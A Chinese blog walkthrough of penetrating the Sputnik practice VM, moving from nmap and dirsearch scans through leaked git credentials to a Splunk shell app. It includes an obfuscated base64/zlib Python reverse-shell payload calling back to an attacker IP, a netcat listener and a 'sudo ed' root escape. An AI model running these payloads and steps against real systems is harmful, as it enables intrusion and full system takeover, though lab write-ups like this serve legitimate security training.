Sputnik 打靶渗透

于 2024-08-08 16:26:13 发布
阅读量745 收藏 3
点赞数 28
文章标签: 网络 运维 linux web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/141026845
版权

一、信息收集

1、查看靶机的MAC地址:

2、查看靶机的ip地址:

nmap 192.168.13.0/24

3、查看靶机开放的端口:

nmap -p- -sC -sT -sV -A 192.168.13.159

4、分别访问靶机的8089、55555和61337端口,发现在61337端口有一个登录框:

点击services和servicesNS是一个登录框

5、扫描各个网页的目录,查看是否有有效信息:

dirsearch -u "https://192.168.13.159:8089"  这个目录里面经过查看几乎没有什么有效信息

dirsearch -u "http://192.168.13.159:55555/"  发现这个目录里有.git源码泄露

dirsearch -u "http://192.168.13.159:61337"   这个登录页面扫描出来几乎都是404,没有有效信息

6、访问.git目录,并查看里面的内容:

7、在.git/logs/HEAD文件中,在里面发现一个clone记录:

8、对代码仓库进行clone,并查看源代码结构:

git clone https://github.com/ameerpornillos/flappy

9、使用git log命令用于显示代码提交的历史日志记录,在历史记录中找到一个secret记录,发现是一个账号和密码:

git log -p

+sputnik:ameer_says_thank_you_and_good_job

10、使用账号和密码登录61337端口:

账号:sputnik

密码:ameer_says_thank_you_and_good_job

11、在splunk上安装github公开工具,获取其shell并武器化:

从安装手册中得知,首先从 https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz 下载版本,然后在splunk中选择"Manage Apps" 并且点击 "Install app from file"

12、上载之后重启使其生效:

13、重启后输入账号密码重新登录后发现已经上传成功:

14、点击权限,选择所有应用然后保存:

15、选择app下的 Search&Reporting功能,在Search栏中可以进行命令执行:

16、反弹shell:

17、kali开启监听:

nc lvvp 5555

18、反弹成功并且查看到用户权限为普通用户:

19、获取一个交互式命令执行环境:

which python,发现本机安装了python环境:

msfvenom -p cmd/unix/reverse_python lhost=192.168.13.128 lport=6666 R

python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNqNkFELgkAMx7+K+HQHMbsLxIh7kDCIqCB9l7wulOxOnH7/0gvao3vY2Pbb/mPNu3P9EKDTLzMEk61mj2PV9U4bRFJ0PtnNvnY4qFBsJYg4AbEBIZOQ9Ke9Kv4aqaHyQuAD+2XpoTxesoLK+0Z+3Z/KvLhl6ZnTNaCdtUYPjE1XkLlJlFPUITzGTjKEZ9Ma6xgn9HoxKRaTkpKd+v8R9L1tWRhVjY2wDvkHQj1eJA==')[0])))"

使用之前获得的shell执行命令,再监听6666端口,前一次执行命令报错是因为忘记监听了:

反弹成功,执行python -c 'import pty;pty.spawn("/bin/bash")'获得交互式shell:

二、提权

1、查看是否具有sudo权限:

sudo -l

2、查询ed进行sudo提权的命令,并使用命令进行提权,成功提到root权限:

sudo ed

!/bin/sh

搬砖小星
关注
  • 28
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sputnik-crx插件
03-18
Sputnik是使用免费的开源智能(OSINT)资源快速轻松地搜索IP,域,文件哈希和URL的扩展。用法•文本-选择要搜索的工件,然后单击鼠标右键•链接-右键单击链接,音频,图像,视频•选择OSINT工具•在大多数情况下,您...
camera-sputnik
05-18
"camera-sputnik"是一个专为Android平台设计的应用程序,其主要功能是通过蓝牙与Arduino设备进行通信,以便从Arduino控制的相机捕获图像。这个应用的独特之处在于它结合了硬件控制(通过Arduino)和软件交互(通过...
Sputnik Gateway-开源
05-03
Sputnik Gateway软件可以将任何具有802.11卡和Internet连接的基于Intel的笔记本电脑或PC转变为功能齐全的无线Sputnik Gateway。 这意味着范围内所有配备无线功能的笔记本电脑,PC,Macintosh或PDA ?? 通常约150
前端开源库-sputnik
08-29
【前端开源库-sputnik】是一个专为前端开发者设计的开源工具,它的主要功能是提供基于阶段的流控制,帮助开发者更加高效地管理和启动服务器。Sputnik这个名字来源于苏联的人造卫星,象征着项目的前瞻性和开拓性。在...
J031_使用TCP协议支持与多个客户端同时通信
lzn20161229的博客
08-03 448
使用TCP协议支持与多个客户端同时通信。
如何计算UDP校验和
ZhongUncle的博客
08-07 623
在了解 UDP 校验和的时候,发现资料很少,如果看教材的话,一定看到过下面这两张图,但是又看不懂,加上解释之后也难懂:本文先说具体怎么算的,再说一些细节,过程中顺带解释一下这两个图(第一张图是布局情况,第二张图是解释如何计算的)。
【Vulnhub系列】Vulnhub Connect-The-Dots 靶场渗透(原创)
Lusen的博客
08-02 601
Vulnhub系列Connect-The-Dots靶场做题记录
linux防火墙相关命令
九品神元师
08-01 311
【代码】linux防火墙相关命令。
Linux shell编程学习笔记68: curl 命令行网络数据传输工具 选项数量雷人(上)
Purpleendurer@CSDN
08-04 1015
网络时代,有经常需要在网络上传输数据,时我们需要通过网络下载文件,为了满足这种时代需要,Linux提供了众多网络命令,我们今天先研究curl命令。例如,我们可以使用curl从 URL 下载文件,或将文件上传到服务器。
开发android app用于移远模块读写IMEI 模组EC200DEULA-D08-SNNDA 支持socket连接读写IMEI
chenhao0568的专栏
08-07 197
发送{“function”: “write_imei”,“imei”: “860004050179648”}响应{“message”: “success”,“imei”: “860004050179648”}当结果正常时message为success,否则message给出英文具体原因,其它参数可能为空。发送{“function”: “read_imei”}响应{“message”: “success”}前面本地5902 转发到 后面设备为5902。PC与终端APP之间 json通信协议。
OSPF小实验
最新发布
sgdhshshhs的博客
08-07 278
【代码】OSPF小实验。
网络安全入门教程(非常详细)从零基础入门到精通_网路安全 教程
2401_85023708的博客
08-03 893
1.入行网络安全这是一条坚持的道路,三分钟的热情可以放弃往下看了。2.多练多想,不要离开了教程什么都不会了,最好看完教程自己独立完成技术方面的开发。3.有时多百度,我们往往都遇不到好心的大神,谁会无聊天天给你做解答。4.遇到实在搞不懂的,可以先放放,以后再来解决。先科普划分一下级别(全部按小白基础,会写个表格word就行的这种)**1级:脚本小子;难度:无,**达到“黑客新闻”的部分水准(一分钱买iphone、黑掉母校官网挂女神照片什么的)网络安全工程师;
杭州等保测评的基础概念
weixin_62641226的博客
08-07 108
该系统共划分为五个等级,每个等级都有不同的安全需求,目的是针对不同敏感程度的信息建立相应的防护机制。在杭州这块“土地”上,“等保”测评既是防范数据泄漏和黑客攻击的“挡箭牌”,也是对企业信用的“试金石”,推动营商环境的优化,助力“数字经济”的繁荣发展。🚀等级保护测评,又称“等保测评”,是杭州这座创新型城市建设的一道重要基础,它既是一个合规要求,也是数字生态系统的捍卫者。借着“智慧城市”的东风,让我们一起揭开“等保测评”的神秘面纱,为建设一个更安全、更可靠的数字化社会作出贡献。
堡垒机简单介绍
凡尘
08-05 485
堡垒机是一种用于控制和管理网络安全的重要工具,它在一个特定的网络环境下,为了保障网络和数据不受入侵和破坏,运用各种技术手段监控对网络内的服务器、网络设备、安全设备、数据库等设备的操作行为,以便于集中报警、及时处理及审计定责。登录功能:提供安全的远程访问接口。账号管理:实现对所有服务器、网络设备、安全设备等账号的集中管理。身份认证:对访问内部网络的用户进行身份验证。资源授权:基于用户、目标设备、时间、协议类型等要素实现细粒度的操作授权。访问控制。
48天笔试训练错题——day43
ミカミミミ博客
08-07 727
48天笔试训练错题——day43.
接口测试学习笔记1
weixin_53666393的博客
08-03 925
同时也像白盒测试那样,检查程序的代码,但这种检查不像白盒测试那样详细、完整,一般只对程序模块之间的调用、核心代码进行检查,在集成测试时经常采用,一般也是程序员大量采用。现在企业说的接口测试,一般指的是Web接口测试或Http接口测试,主要指的是基于B/S架构的接口测试(B/S架构主要基于HTTP 超文本传输协议,所以也叫HTTP接口测试)对请求对象(网页、文件、图片...)进行的操作,就是一些命令,程序员在编程的时候使用,在接口文档中会指明,测试人员测试接口的时候,按照说明选择正确的方法。
自动获取ip地址什么意思?电脑ip地址怎么设置自动获取
hgdlip的博客
08-02 1109
在当今数字化时代,网络连接已成为我们日常生活和工作中不可或缺的一部分。然而,对于非技术用户而言,复杂的网络配置常常令人望而生畏。幸运的是,自动获取IP地址(Dynamic Host Configuration Protocol, DHCP)技术的出现,极大地简化了这一过程,让网络配置变得更加轻松和高效。下面跟着虎观代理小二一起来了解一下探讨自动获取IP地址含义,并详细介绍电脑怎样设置自动获取IP地址。
Modbus通讯协议
qq_3517289697的博客
08-02 750
Modbus协议是一种用于电子控制器之间的通信协议,‌它允许不同类型的设备之间进行通信,‌以便进行数据交换和控制。‌Modbus协议最初为可编程逻辑控制器(‌PLC)‌通信开发,‌现已广泛应用于工业自动化领域,‌包括但不限于工业控制、‌楼宇自动化、‌能源管理等领域。‌该协议支持多种通信接口和物理介质,‌包括串行(‌RS-232、‌RS-485等)‌、‌以太网以及无线通信等,‌使其能够适应各种不同的应用场景。‌。
Java实现抓包并将数据呈现到前端
LB_bei的博客
08-05 271
环境:windows10、jdk17、springboot3需求分析,首先需要对本地某个端口进行抓包,然后用websocket将数据传到前端。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值